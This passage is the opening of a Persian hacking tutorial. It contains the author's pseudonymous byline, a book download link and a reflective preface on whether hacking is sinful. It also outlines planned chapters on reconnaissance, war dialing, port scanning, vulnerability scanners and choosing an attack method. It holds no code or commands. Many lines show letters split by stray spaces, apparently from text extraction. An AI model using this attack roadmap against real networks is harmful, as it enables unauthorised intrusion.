ﻣﻘﺎﻟﻪ آﻣﻮزﺷﯽ ﻫﮏ و اﻣﻨﯿﺖ ﺷﺒﮑﻪ
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢
ﺑﻪ ﻧﺎم ﺧﺪاوﻧﺪ ﺑﺨﺸﻨﺪﻩ و ﻣﻬﺮﺑﺎن
+ﻧﺎم ﻣﻘﺎﻟﻪ :ﺁﻣﻮزش و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰارهﺎی هﮏ . +ﻣﻮﺿﻮع :هﮏ ،ﺷﺒﮑﻪ و اﻣﻨﻴﺖ ﺷﺒﮑﻪ . +ﻧﻮﻳﺴﻨﺪﻩ :ﺧﻮدم
[email protected]ﺏﺎ ﻧﺎم ﻣﺴﺘﻌﺎر " ﺁﻗﺎی ﻣﻦ " !! +ﻟﻴﻨﮏ ﻣﺴﺘﻘﻴﻢ ﺑﺮای داﻧﻠﻮد https://www.sharemation.com/zxo00003/hack-book-farsi.zip :
ﻧﻔﻮذ ﮔﺮی در ﺷﺒﮑﻪ و رهﺰﻧﯽ دادﻩ هﺎ زیﺒﻨﺪﻩ ﺏﺮدﮔﺎن ﺧﺎک و ﭘﻨﺪارهﺎی ﻧﺎﭘﺎک اﺱﺖ .ﺁﺱﻤﺎﻧﻴﺎن ﭘﺎک ﻧﻬﺎد و ﻗﺪﺱﻴﺎن زﻣﻴﻦ ﺏﻪ رهﺰﻧﯽ ﮐﺎروان دل و ﻧﻔﻮذ در ﻗﻠﻮب ﻣﺸﻐﻮﻟﻨﺪ .ﺁﻧﻬﺎیﯽ ﮐﻪ در هﺮ ﻧﻈﺮﺷﺎن هﺰار ﻧﮑﺘﻪ ﻣﻀﻤﺮ دارﻧﺪ .دریﻎ و اﻓﺴﻮس ﮐﻪ در وﺻﻒ ایﻦ ﺱﻠﮏ ﭼﻨﺪان ﻗﻠﻢ ﻧﺰدﻧﺪ و ﮐﺘﺎﺏﯽ ﻧﻨﻮﺷﺘﻨﺪ.
ﻣﻦ ﺑﻪ وﺳﻌﺖ اﻧﺪﯾﺸﻪ و ﮐﺮاﻣﺖ ﻃﺒﻊ ﺧﻮاﻧﻨﺪﮔﺎن ﻓﺮهﻴﺨﺘﻪ اﯾﻤﺎن دارم و اﯾﻦ اوراق ﻧﺎﭼﻴﺰ را ﺑﻪ ﭘﺎس ﺑﻬﺮﻩ ﮔﻴﺮی ﺻﺤﻴﺢ از ﻣﻔﺎد و اﺑﺰارهﺎی ﻣﻌﺮﻓﯽ ﺷﺪﻩ ﮐﻪ اﻟﺒﺘﻪ ﺗﻴﻐﯽ اﺳﺖ دو دم ﺑﻪ ﺧﺎﮐﭙﺎی ﺁﻧﺎن ﺗﻘﺪﯾﻢ ﻣﻴﮑﻨﻢ.
ﺗﺎرﯾﺦ ﺁﻏﺎز ﻧﮕﺎرش ﻣﻘﺎﻟﻪ ) ١٣٨٣/١٢/٢٨ :ﻣﺼﺎدف ﺑﺎ ﺟﺸﻦ ﭼﻬﺎرﺷﻨﺒﻪ ﺻﻮری ( ﺗﺎرﯾﺦ ﭘﺎﯾﺎن ﻧﮕﺎرش ﻣﻘﺎﻟﻪ ) ١٣٨۴/١/١١ :ﻣﺼﺎدف ﺑﺎ ارﺑﻌﻴﻦ ﺣﺴﻴﻨﯽ( ﺗﺎرﯾﺦ ﺷﺮوع وﯾﺮاﯾﺶ ﻣﻘﺎﻟﻪ ١٣٨۴/١/١١ : ﺗﺎرﯾﺦ ﭘﺎﯾﺎن وﯾﺮاﯾﺶ ﻣﻘﺎﻟﻪ :ﻣﺘﺎﺳﻔﺎﻧﻪ ﻣﻘﺎﻟﻪ را دوﺑﺎرﻩ ﻧﺘﻮاﻧﺴﺘﻢ ﺑﻪ ﻋﻠﺖ ﮐﻤﺒﻮد وﻗﺖ وﯾﺮاﯾﺶ ﮐﻨﻢ؛ ﺑﻪ ﺑﺰرﮔﻮاری ﺧﻮدﺗﺎن ﻏﻠﻂ هﺎی اﻣﻼﯾﯽ و دﺳﺘﻮری و ...را ﻧﺎدﯾﺪﻩ ﺑﮕﻴﺮﯾﺪ !! ﺗﺎرﯾﺦ وﯾﺮاﯾﺶ دوﺑﺎرﻩ ﻣﻘﺎﻟﻪ :اﺣﺘﻤﺎﻻ اوﻟﻴﻦ روزهﺎی ﺗﺎﺑﺴﺘﺎن !! ١٣٨۴
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٣
ﻣﻘﺪﻣﻪ ﺧﻮدم ﺑﺮ ﺧﻮدم ﺑﺮ ﻧﮕﺎرش ﻣﻘﺎﻟﻪ : واﻗﻌًﺎ ﻧﻤﯽ داﻧﻢ ﮐﻪ ﭼﺮا ﺏﻌﺪ از ایﻦ هﻤﻪ ﻣﺪت ﺏ ﺮای اوﻟ ﻴﻦ ﺏ ﺎر ﺁن ه ﻢ در ای ﻦ ﺷ ﺮایﻂ ﺕ ﺼﻤﻴﻢ ﮔ ﺮﻓﺘﻢ ﺱ ﮑﻮت ﺧ ﻮد را ﺏ ﺸﮑﻨﻢ .ﻗﺒ ﻞ از ای ﻦ ی ﮏ ﺏ ﺎر ﺕﺼﻤﻴﻤﯽ ﻣ ﺸﺎﺏﻪ ﮔ ﺮﻓﺘﻢ و ی ﮏ ﺱ ﺎیﺖ ﻃﺮاﺡ ﯽ ﮐ ﺮدم اﻣ ﺎ وﺱ ﻂ ﮐ ﺎر ﭘ ﺸﻴﻤﺎن ﺷ ﺪم و ﮐ ﺎر را ﻧ ﺼﻔﻪ ﮐ ﺎرﻩ ره ﺎ ﮐ ﺮدم .ﺷ ﺎیﺪ ﻋ ﺪم ﭘ ﺬیﺮش درﺧﻮاﺱ ﺖ ﻋﻀﻮیﺖ ﻣﻦ در ﺱﺎیﺖ tur2.comﻣﺰیﺪ ﺏﺮ ﻋﻠﺖ ﺷﺪﻩ ﺏﺎﺷﺪ وﻟﯽ ایﻦ ﺏﺮای ﻣﻦ ﻣﻬﻢ ﻧﺒﻮد ﭼﻮن ﺏﻪ هﺮ دو ﻃﺮف ،هﻢ ﺧ ﻮدم وه ﻢ ﮔﺮداﻧﻨ ﺪﮔﺎن ﺱ ﺎیﺖ ﺡﻖ ﻣﻴﺪهﻢ .ﺱﺎیﺘﯽ ﮐﻪ ﻓﻘﻂ یﮏ ﺻﻔﺤﻪ اول دارد ﺧﻮب ﻣﻌﻠﻮم اﺱﺖ ﮐﻪ در ﺟﻮاب ﺏﻪ ﻣﻦ ﭼﻪ ﻣﻴﮕﻮیﻨ ﺪ ﺕ ﺎزﻩ ﺏﺎی ﺪ ﻣﺘ ﺸﮑﺮ ه ﻢ ﺏﺎﺷ ﻢ ﮐ ﻪ ﺟ ﻮاب دادن و ﮔﻔﺘﻦ ﮐﻪ ایﻦ درﺧﻮاﺱﺖ رد ﺷﺪﻩ اﺱﺖ .اﻟﺒﺘﻪ هﻢ ﺧﻮدم ﺏﻪ ﺧﻮدم ﺡﻖ ﻣﻴﺪهﻢ ﮐﻪ ﭼﺮا ﺏﺎ داﻧﺴﺘﻦ ایﻦ هﻤﻪ ﻣﻄﻠ ﺐ و ﺷ ﻴﻮﻩ و ...در ﺧﻮاﺱ ﺘﻢ رد ﺷ ﺪﻩ اﺱ ﺖ !!! وﻟﯽ ایﻦ واﻗﻌًﺎ ﻣﻬﻢ ﻧﺒﻮد ،اول ﻣﻄﻠﺐ هﻢ ﮔﻔﺘﻢ واﻗﻌًﺎ ﺏﺮایﻢ ﻣﻬ ﻢ ﻧﺒ ﻮد ﺷ ﺎیﺪ ﻋﻠ ﺖ اﺻ ﻠﯽ ای ﻦ ﺏ ﻮد ﮐ ﻪ ﺏ ﻪ ﺷ ﺪت از ﺁیﻨ ﺪﻩ ﺧ ﻮدم ﻣﻴﺘﺮﺱ ﻴﺪم و ﺏ ﺮای ﺱﺮﮔﺮم ﮐﺮدن ﺧﻮدم دﺱﺖ ﺏﻪ ﻧﻮﺷﺘﻦ ایﻦ ﻣﻘﺎﻟﻪ زدم و ﺷﺎیﺪ هﻢ اﻧﺠﺎم دیﻨﯽ ﮐﻪ ﺏﻪ ﮔﺮدﻧﻢ دارد ایﻦ ﺱﺎیﺖ .ﺡﻘﻴﻘﺘًﺎ اوﻟﻴﻦ ﺟﺎیﯽ ﺏﻮد ﮐ ﻪ ﻣ ﻦ ﺏ ﺎ ای ﻦ ﻣﻘﻮﻟ ﻪ ﺁﺷﻨﺎ ﺷﺪم و ﻣﻄﺎﻟﺐ ﺏﺪرد ﺏﺨﻮری یﺎﻓﺘﻢ .اﻣﺎ دﻟﻴﻞ ﻧﻨﻮﺷﺘﻦ ﻣﻄﺎﻟﺐ ﺁﻣﻮزﺷﯽ در ای ﻦ ﺏ ﺎرﻩ ﺕ ﺎ ﺏ ﻪ ای ﻦ ﻟﺤﻈ ﻪ را ﺏ ﻪ یﻘ ﻴﻦ ﻣﻴ ﺸﻮد ﮔﻔ ﺖ و ﺁن ﭼﻴ ﺰی ﺟ ﺰء ﻋﺪم ﻧﺘﻴﺠﻪ ﮔﺮی و اﻟﺒﺘﻪ ﺕﺼﻤﻴﻢ ﮔﻴﺮی درﺏﺎرﻩ ﻣﻘﻮﻟﻪ ﺷﺮﻋﯽ ایﻦ ﻣﻄﻠﺐ در ﭘﻴﺶ ﺧﻮدم اﺱﺖ؛ ﮐﻪ ﺁیﺎ ایﻦ ﮐﺎری ﮐﻪ ﻣﻦ ﻣﻴﮑﻨﻢ از ﻧﻈﺮ ﺧﺪاوﻧ ﺪ ﺏﺨ ﺸﻨﺪﻩ و ﻣﻬﺮﺏﺎن ﺁیﺎ ﮔﻨﺎﻩ و ﻣﻌﺼﻴﺖ اﺱﺖ یﺎ راﻩ ﺻﻮاب و ﭘﺎداش دیﮕ ﺮ واﻗﻌ ًﺎ ﻣ ﻦ در ای ﻦ ﺏ ﺎرﻩ ﺱ ﺮﮔﺮدان ﺷ ﺪﻩ ام ،زﺏ ﺎﻧﻢ در ﺕﻮﺻ ﻴﻒ ای ﻦ ﻣﻄﻠ ﺐ ﺏ ﺴﻴﺎر ﻧﺎﺕﻮان اﺱﺖ ﺏﻪ هﻤﻴﻦ ﺧﺎﻃﺮ ﻧﻮﺷﺘﻪ ﻋﻴﻦ اﻟﻘﻀﺎت هﻤﺪاﻧﯽ را در زیﺮ ﻣﯽ ﺁورم ﮐﻪ ﺏﻪ اﺡﻮاﻻت ﻣﻦ ﺏﺴﻴﺎر ﻧﺰدیﮏ اﺱﺖ.
ﭼﻪ ﻧﻮﻳﺴﻢ؟! هﺮ ﭼﻪ ﻣﯽ ﻧﻮﻳﺴﻢ ﭘﻨﺪاری دﱂ ﺧﻮش ﻧﻴﺴﺖ و ﺑﻴﺸﱰ ﺁﻧﭽﻪ در اﻳﻦ روزهﺎ ﻧﺒﺸﺘﻢ ﳘﻪ ﺁن اﺳﺖ ﮐﻪ ﻳﻘﻴﻦ ﻧﺪاﱎ ﮐﻪ ﻧﺒﺸﺘﻨﺶ ﲠﱰ اﺳﺖ ﻳﺎ ﻧﺎ ﻧﺒﺸﺘﻨﺶ. ای دوﺳﺖ! ﻧﻪ هﺮﭼﻪ درﺳﺖ اﺳﺖ و ﺻﻮاب ﺑﻮد،روا ﺑﻮد ﮐﻪ ﺑﮕﻮﻳﻨﺪ ...و ﻧﺒﺎﻳﺪ ﮐﻪ در ﲝﺮی اﻓﮑﻨﻢ ﺧﻮد را ﮐﻪ ﺳﺎﺡﻠﺶ ﭘﺪﻳﺪ ﻧﺒﻮد،و ﭼﻴﺰهﺎ ﻧﻮﻳﺴﻢ ﺑﯽ»ﺧﻮد« ﮐﻪ ﭼﻮن وا»ﺧﻮد« ﺁﻳﻢ ﺑﺮ ﺁن ﭘﺸﻴﻤﺎن ﺑﺎﺷﻢ و رﳒﻮر. ای دوﺳﺖ ﻣﻴﱰﺳﻢ...و ﺟﺎی ﺗﺮس دارد...از ﻣﮑﺮ ﺳﺮﻧﻮﺷﺖ... ﺡﻘﺎ و ﺑﻪ ﺡﺮﻣﺖ دوﺳﺘﯽ،ﮐﻪ ﳕﻴﺪاﱎ ﮐﻪ اﻳﻦ ﮐﻪ ﻣﻴﻨﻮﻳﺴﻢ راﻩ ﺳﻌﺎدت اﺳﺖ ﮐﻪ ﻣﻴﺮوم ﻳﺎ راﻩ ﺷﻘﺎوت؟ و ﺡﻘﺎ،ﮐﻪ ﳕﻴﺪاﱎ ﮐﻪ اﻳﻦ ﮐﻪ ﻧﺒﺸﺘﻢ ﻃﺎﻋﺖ اﺳﺖ ﻳﺎ ﻣﻌﺼﻴﺖ؟ ﮐﺎﺷﮑﯽ ﮐﻪ ﻳﮏ ﺑﺎرﮔﯽ ﻧﺎدان ﺷﺪﻣﯽ ﺗﺎ از ﺧﻮد ﺧﻼﺻﯽ ﻳﺎﻓﺘﻤﯽ! ﭼﻮن در ﺡﺮﮐﺖ و ﺳﮑﻮن ﭼﻴﺰی ﻧﻮﻳﺴﻢ،رﳒﻮر ﺷﻮم از ﺁن ﺑﻪ ﻏﺎﻳﺖ! و ﭼﻮن در ﻣﻌﺎﻣﻠﺖ راﻩ ﺧﺪا ﭼﻴﺰی ﻧﻮﻳﺴﻢ،هﻢ رﳒﻮر ﺷﻮم; ﭼﻮن اﺡﻮال ﻋﺎﺷﻘﺎن ﻧﻮﻳﺴﻢ ﻧﺸﺎﻳﺪ، ﭼﻮن اﺡﻮال ﻋﺎﻗﻼن ﻧﻮﻳﺴﻢ،هﻢ ﻧﺸﺎﻳﺪ، و هﺮﭼﻪ ﻧﻮﻳﺴﻢ،هﻢ ﻧﺸﺎﻳﺪ، و اﮔﺮ هﻴﭻ ﻧﻨﻮﻳﺴﻢ هﻢ ﻧﺸﺎﻳﺪ، و اﮔﺮ ﮔﻮﻳﻢ ﻧﺸﺎﻳﺪ، و اﮔﺮ ﺧﺎﻣﻮش ﮔﺮدم هﻢ ﻧﺸﺎﻳﺪ، و اﮔﺮ اﻳﻦ وا ﮔﻮﻳﻢ ﻧﺸﺎﻳﺪ و اﮔﺮ وا ﻧﮕﻮﻳﻢ هﻢ ﻧﺸﺎﻳﺪ... ...و اﮔﺮ ﺧﺎﻣﻮش ﺷﻮم هﻢ ﻧﺸﺎﻳﺪ!
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٤
ﻣﻘﺪﻣﻪ ﻣﻘﺎﻟﻪ : ﺏﺪون هﻴﭻ اﻏﺮاق ﻣﻴﮕﻮیﻢ ﮐﻪ ﺕﺎ ﺏﻪ ﺡﺎل هﻴﭻ ﺻﻔﺤﻪ وب ﺱﺎیﺘﯽ را Deificﻧﮑﺮدﻩ ام .اﻣ ﺎ ای ﻦ دﻟﻴ ﻞ ﺏ ﺮ ﻧ ﺎﺕﻮاﻧﯽ ﻣ ﻦ ﻧﻴ ﺴﺖ ﺏﻠﮑ ﻪ ای ﻦ ﮐ ﺎر را ﺏ ﺴﻴﺎر ﭘﺴﺖ و ﮐﻢ اهﻤﻴﺖ ﻣﻴﺪاﻧﻢ ﮐﻪ در اداﻣﻪ ﻣﺘﻮﺟﻪ ﺧﻮاهﻴﺪ ﺷﺪ هﻴﭻ دﻟﻴﻠﯽ ﺏﺮای ﻧﻮﺷﺘﻦ ایﻦ ﻣﻘﺎﻟﻪ ﻧﺪارم و ، ...و اﺻﻼ ﻧﻤ ﯽ داﻧ ﻢ ﺏ ﺮای ﭼ ﻪ و ﮐ ﻪ ﻣﻴﻨﻮی ﺴﻢ اﻟﺒﺘﻪ اﻣﻴﺪوار هﺴﺘﻢ ﮐﻪ ﺷﻤﺎ هﻢ از ایﻦ ﮐﺎرهﺎ ﻧﮑﻨﻴﺪ .اﻟﺒﺘﻪ ﺏﻪ هﻴﭻ وﺟﻪ " ﻣﻦ اﻟﻮﺟﻮد " ﻧﻤﯽ ﺕﻮان ﻟﺬت ایﻦ ﮐﺎر را اﻧﮑ ﺎر ﮐ ﺮد ﺏ ﺮای ﺕ ﺎزﻩ ﮐﺎره ﺎ و ی ﺎ ﺏﻪ ﻋﺒﺎرﺕﯽ ﻧﻮ ﻧﻬﺎل هﺎ .وﻟﯽ در ﮐﻞ ﻣﻦ ﺏﺎ ایﻦ ﮐﺎر ﻣﺨﺎﻟﻒ هﺴﺘﻢ .اﺻﻮﻻ ﻣﻘﻮﻟﻪ هﮏ ﺧﻴﻠﯽ ﮔﺴﺘﺮدﻩ اﺱﺖ و ﻧﻤ ﯽ ﺕ ﻮان در ای ﻦ ﺏ ﺎرﻩ ﻣﺜ ﻞ ﺏﻘﻴ ﻪ ﻣﻘﻮﻟ ﻪ هﺎ ﺻﺤﺒﺖ ﮐﺮد و ﺏﻪ ﺱﺮﻋﺖ در ﺡﺎل ﺕﻐﻴﻴﺮ ﺷﻴﻮﻩ ،و ﻣﮑﺎﻧﻴﺰم هﺎ و ایﺠﺎد اﺏﺰارهﺎی ﺟﺪیﺪ و اﻟﺒﺘﻪ از دور ﺧﺎرج ﺷﺪن اﺏﺰارهﺎی ﭘﻴﺮ و ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ. واﻗﻌًﺎ ﺁﻣﻮزش ایﻦ ﻣﻄﻠﺐ ﮐﺎر دﺷﻮاری اﺱﺖ ﺏﺮای ﻣﻨﯽ ﮐﻪ ﺕﺎ ﺏﻪ ﺡﺎل ﻓﻘﻂ ﺏﻪ دﻧﺒ ﺎل ﺁﻣ ﻮزش ﺧ ﻮدم ﺏ ﻮدﻩ ام ﻧ ﻪ ﮐ ﺲ دیﮕ ﺮی و ﻓﻘ ﻂ و ﻓﻘ ﻂ ﺏ ﻪ ﺧ ﻮدم ﻓﮑﺮ ﻣﻴﮑﺮدﻩ ام .ﭘﻴﺸﺮﻓﺖ در ایﻦ راﻩ ﺏﺪون ﺕﺮدیﺪ ﻧﻴﺎز ﻣﺒﺮم ﺏﻪ ﻣﻄﺎﻟﻌﻪ ﮐﺘﺎﺏﻬﺎی روز ایﻦ ﻣﻘﻮﻟﻪ دارد ﮐﻪ اﻟﺒﺘﻪ ﺏﻴﺸﺘﺮ ایﻦ ﻣﺮاﺟ ﻊ و ﮐﺘﺎﺏﻬ ﺎ ﺏ ﻪ زﺏ ﺎن " اَﻧﮕﻞ اﺱﺘﺎﻧﯽ " ﻣﻌﺎدل هﻤ ﺎن اﻧﮕﻠﻴ ﺴﯽ ﺧﻮدﻣ ﺎن اﺱ ﺖ ﮐ ﻪ واﻗﻌ ًﺎ ﺏ ﺮای ﭘ ﻴﺶ رﻓ ﺖ در ای ﻦ راﻩ داﻧ ﺴﺘﻦ ﺡ ﺪاﻗﻞ اﻧ ﺪﮐﯽ از ای ﻦ زﺏ ﺎن ﻻزم اﺱ ﺖ .روﻧ ﺪ ﻧﮕﺎرش ایﻦ ﻣﻘﺎﻟ ﻪ ﺏ ﻪ ه ﻴﭻ وﺟ ﻪ ﻗﺎﺏ ﻞ دﻓ ﺎع ﻧﻴ ﺴﺖ ﭼ ﻮن ﻣ ﻦ ه ﻢ ﻣﺜ ﻞ ﺷ ﻤﺎ اﻟﺒﺘ ﻪ ﺏﻌ ﺪ از ﺧﻮاﻧ ﺪن ای ﻦ ﻣﻘﺎﻟ ﻪ ﭘ ﯽ ﺏ ﻪ ای ﻦ ﮐ ﻪ ﮔ ﺴﻴﺨﺘﮕﯽ ﻣﻄﺎﻟ ﺐ واﻗﻌ ًﺎ وﺡﺸﺘﻨﺎک اﺱﺖ ،ﭘﯽ ﺏﺮدم و ﺏﻪ هﻴﭻ وﺟﻪ هﻢ از ﺁیﻴﻦ ﻧﮕﺎرش ﺁن ﻧﻤﯽ ﺷﻮد دﻓﺎع ﮐﺮد ﭼﻮن ﺷﻤﺎ ﺡﺘ ﯽ ﻧﻤﻴﺘﻮاﻧﻴ ﺪ دو ﺟﻤﻠ ﻪ را ﭘ ﺸﺖ ﺱ ﺮ ه ﻢ ﭘﻴ ﺪا ﮐﻨﻴ ﺪ ﮐﻪ ﻓﻌﻞ ﻓﺎﻋﻞ در ﺟﺎی ﺧﻮد ﺁﻣﺪﻩ ﺏﺎﺷﺪ و اﻟﺒﺘﻪ ﻏﻠﻂ هﺎی اﻣﻼیﯽ ﮐﻪ ﺏﻴﺪاد ﻣﻴﮑﻨﺪ و... هﻴﭻ ادﻋﺎیﯽ ﻧﻴﺴﺖ ،ﻣﻦ هﻢ ﻣﺜﻞ ﺷﻤﺎ هﺴﺘﻢ ،ﭼﻨﺪ ﺻﺒﺎﺡﯽ ﭘﻴﺶ ﻣﻦ ﻧﻴﺰ یﮏ ﮐ ﺎرﺏﺮ ﻣﻌﻤ ﻮﻟﯽ رایﺎﻧ ﻪ ﺏ ﻮدم ﮐ ﻪ ﺡﺘ ﯽ ﺏ ﺎور ﮐﻨﻴ ﺪ ﻧﻤﻴﺪاﻧ ﺴﺘﻢ ای ﻦ وﺱ ﻴﻠﻪ ﭼﮕﻮﻧ ﻪ ﺧ ﺎﻣﻮش ﻣﻴ ﺸﻮد و ﺏ ﺎ زدن دﮐﻤ ﻪ روی ﮐ ﻴﺲ ه ﯽ ای ﻦ رایﺎﻧ ﻪ ﺏ ﻪ ﺧ ﻮاب Stand bayﻣﻴﺮﻓ ﺖ و ﻣ ﻦ ﻣﻴﮕﻔ ﺘﻢ ای ﻦ ﺧ ﺮاب ﺷ ﺪﻩ ﭼ ﺮا ﺧ ﺎﻣﻮش ﻧﻤﻴﺸﻮد!! یﮑﯽ از دﻻیﻞ اﺻﻠﯽ ﻣﻦ ﮐﻪ رﻓﺘﻢ ﺱﺮاغ ایﻦ وﺱﻴﻠﻪ و ﺏﻪ ﻧﻈﺮ ﺧﻮدم ) اﻟﺒﺘﻪ ﺏﻪ هﻴﭻ وﺟﻪ ﺧﻮد ﺱﺘﺎی ﻧﻴﺴﺖ ( ﺏﻪ ایﻦ درﺟﻪ ﮐ ﻪ ﺧ ﻮدم ﻣﻴ ﺪاﻧﻢ رﺱﻴﺪم هﻤﻴﻦ ﻣﻮﺽﻮع ﺏﻮد ﮐﻪ ﺧﺪﻣﺖ ﺷﻤﺎ هﺎ ﻋﺮض ﮐﺮدم ﺏﻮدﻩ اﺱﺖ. ایﻦ را ﻗﺒﻞ از ﮔﻔﺘﻦ روﻧﺪ ﻣﻘﺎﻟﻪ ذﮐﺮ ﮐﻨﻢ ﮐﻪ ﺷﻤﺎ اﮔﺮ ﺏﻪ دﻧﺒﺎل اراﺟﻴﻒ و ﻣﻬﻤﻼﺕﯽ هﻢ ﭼﻮن ﺱ ﻮزاﻧﺪن CPUو ﺱ ﻮزاﻧﺪن ه ﺎرد و ...از ای ﻦ دﺱ ﺖ و ﮐﺎرهﺎی ﺏﯽ اهﻤﻴﺘﯽ هﻤﭽﻮن یﺎﻓﺘﻦ ﭘﺴﻮرد IDیﺎهﻮ و ...هﺴﺘﻴﺪ ایﻦ ﻣﻘﺎﻟﻪ ﺏﻪ ﺷﻤﺎ اﺻﻼ ﮐﻤﮏ ﻧﻤﻴﮑﻨﺪ .ﺏﻬﺘﺮ اﺱﺖ ﺏ ﺮای ﭘﻴ ﺪا ﮐ ﺮدن ﺁﻣ ﻮزش ه ﺎیﯽ از ایﻦ دﺱﺖ یﮏ ﻣﻘﺎﻟﻪ دیﮕﺮ ﭘﻴﺪا ﮐﻨﻴﺪ!! روﻧﺪ ﺁﻣﻮزش هﮏ اﻟﺒﺘﻪ هﮏ ﺱﺮور را ﺕﺎ ﺟﺎیﯽ ﻣﻴﺸﻮد هﻤﻴﺸﻪ ﺱﻴﺴﺘﻤﺎﺕﻴﮏ ﻓﺮض ﮐﺮد و روال ﺙﺎﺏﺘﯽ دارد وﻟﯽ هﺮﭼﻪ ﺏﻪ ﻣﺮاﺡﻞ ﺁﺧ ﺮ ﻣﻴﺮﺱ ﻴﻢ ای ﻦ روﻧﺪ ﮐﺎﻣﻼ ﺏﻪ ﺕﺠﺮﺏﻪ داﻧﺶ و اﻟﺒﺘﻪ از هﻤﻪ ﻣﻬﻤﺘﺮ ﺏﻪ اﻃﻼﻋﺎﺕﯽ ﺏﺴﺘﮕﯽ دارد ﮐﻪ از ﻣﺮاﺡﻞ ﻗﺒﻞ ﺏﺪﺱﺖ ﺁوردﻩ ایﺪ ﻣﺮاﺡ ﻞ ﺁﺧ ﺮ ﭼ ﻮن ﺏ ﺮای ﺕ ﮏ ﺕ ﮏ ﺱﻴﺴﺘﻤﻬﺎ ﻣﺘﻔﺎوت اﺱﺖ ﺡﻘﻴﻘﺘًﺎ ﻧﻤﻴﺸﻮد زیﺎد در ﺁن وارد ﺷﺪ اﻣﺎ ﻣﻦ ﺏﺮای ﺁن یﮏ راﻩ ﮐﻠﯽ را ﻣﻌﺮﻓ ﯽ ﻣﻴﮑ ﻨﻢ اﻟﺒﺘ ﻪ %١٠٠ﻋﻤﻠ ﯽ ﻧﻴ ﺰ ه ﺴﺖ .ﻗ ﺴﻤﺖ ﺱﻴﺴﺘﻤﺎﺕﻴﮏ هﻤﻴﺸﻪ ) اﮐﺜﺮ اوﻗﺎت ﺏﺎ ﺕﺠﺮﺏﻪ هﺎ دور ﻣﻴﺰﻧﻨﺪ ﺏﺎ ﺕﺠﺮﺏﻪ ایﯽ ﮐﻪ دارﻧﺪ ( ﻣﺸﺨﺺ اﺱ ﺖ و ﺷ ﺎﻣﻞ ﻣﺮاﺡ ﻞ ﺟﻤ ﻊ ﺁوری اﻃﻼﻋ ﺎت و ﭘ ﻮیﺶ ﭘﻮرت و ﭘﻮیﺶ ﻧﻘﺎط ﺁﺱﻴﺐ ﭘﺬیﺮ و ﮐﺸﻒ ﺱﺮویﺲ هﺎ ،ﮐﺸﻒ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ و ...اﺱﺖ .ﻣﺮاﺡﻞ ﻏﻴﺮ ﺱﻴﺴﺘﻤﺎﺕﻴﮏ ﮐﺎﻣﻼ واﺏﺴﺘﻪ ﺏﻪ اﻃﻼﻋﺎﺕﯽ اﺱ ﺖ ﮐ ﻪ در ایﻦ ﻣﺮﺡﻠﻪ ﺏﺪﺱﺖ ﻣﻴﺂوری ﺪ و ﭼ ﻮن اﻃﻼﻋ ﺎت ﺏﺪﺱ ﺖ ﺁﻣ ﺪﻩ هﻤﻴ ﺸﻪ در %٩٩٫٩٩٩٩ﻣﻮاﻗ ﻊ ﻣﺘﻔ ﺎوت اﺱ ﺖ ﻧﻤﻴ ﺸﻮد ﺏ ﺮای ای ﻦ ﮔ ﺎم از ی ﮏ ﺷ ﻴﻮﻩ هﻤﻴﺸﻪ اﺱﺘﻔﺎدﻩ ﮐﺮد .ایﻦ ﻣﻘﺎﻟﻪ ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﮔﺎم اول ﮐﻪ ﺷﺎﻣﻞ ﻣﺮاﺡﻞ ﻣﺨﺘﻠﻔﯽ هﻤﭽﻮن ﺷﻨﺎﺱﺎیﯽ ﻣﻘﺪﻣﺎﺕﯽ ﺷﺒﮑﻪ هﺪف ) ﮐﻪ در ایﻦ ﺟﺎ ﺏﻪ ﻣﺘﺪ ه ﮏ ﺏ ﻪ ﺷﻴﻮﻩ WAR Dialingرا ﮐﺎﻣﻼ ﺕﻮﺽﻴﺢ دادﻩ ام ﮐﻪ رﺏﻂ ایﻦ ﻣﺘﺪ را ﺏﻪ ﺁن ﻗ ﺴﻤﺖ ﻧﻤ ﯽ داﻧ ﻢ ﺧ ﻮدم ه ﻢ ،وﻟ ﯽ ﺟ ﺎی دیﮕ ﺮی ﺏ ﺮای ﺕﻮﺽ ﻴﺢ ﺁن ﭘﻴ ﺪا ﻧﮑﺮدم ( و در ﮔﺎم دوم ﺱﻌﯽ ﺏﺮ ﺕﻮﺽﻴﺢ و ﺁﻣﻮزش ﭘﻮیﺶ ﭘﻮرت هﺎ و ﺏﻌﺪ ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت از ﺱﺮ ﺏﺮﮔﻬﺎ یﺎ " هﺪر هﺎ " ﺏﭙ ﺮدازم .در ﮔ ﺎم ﺱ ﻮم ﺱﻌﯽ ﺏﺮ ﺁن ﮐﺮدﻩ ام ﻧﺮم اﻓﺰارهﺎی ﭘﻮش ﻧﻘﺎط ﺁﺱﻴﺐ ﭘﺬیﺮی ﺱﻴﺴﺘﻢ و ﺏﺮﻧﺎﻣﻪ هﺎی ﮐﺎرﺏﺮدی را ﺕﻮﺽﻴﺢ دهﻢ .در ﮔﺎم ﭼﻬﺎرم و ﺁﺧﺮ ﺕﻤ ﺎم ﺕ ﻼش ﺧ ﻮد را ﮐﺮدﻩ ام ﮐﻪ ﮐﻤﮏ ﺏﻪ ﺕﺠﺰیﻪ ﺕﺤﻠﻴﻞ اﻃﻼﻋﺎت ﺏﺪﺱﺖ ﺁﻣﺪﻩ را اﻧﺠﺎم دهﻢ ﺕﺎ ﺷﻤﺎ در اﻧﺘﺨﺎب ﺷﻴﻮﻩ ﻣﻮرد ﻧﻈﺮ ﺏﺮای ﺡﻤﻠﻪ ﺏﻬﺘﺮیﻦ را اﻧﺘﺨﺎب ﮐﻨﻴﺪ . ﺁﺧﺮیﻦ ﺡﺮف ﻣﻦ ﺕﻮﺟﻪ ﺏﻪ ایﻦ 